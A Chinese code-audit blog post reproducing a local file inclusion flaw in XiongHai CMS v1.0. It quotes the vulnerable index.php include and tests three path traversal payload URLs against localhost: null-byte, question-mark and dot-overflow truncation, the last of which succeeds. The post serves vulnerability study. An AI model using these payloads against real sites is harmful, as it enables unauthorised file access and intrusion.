代码审计:熊海cms 首页文件包含漏洞复现
程序员文章站
2022-04-30 11:42:09
...
熊海cms
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。
复现版本为 熊海CMS_V1.0 版本,各位可自行下载。
代码审计
先使用Seay工具审计一波,根据关键代码回溯。
工具显示index.php中文件包含函数存在变量,存在漏洞。
具体代码如下:
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
这是个很典型的文件包含漏洞,接受r参数,r不为空则带入包含文件。
漏洞复现
在根目录下存放一个测试文件1.php。
利用漏洞包含文件。
%00截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?号截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截断,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................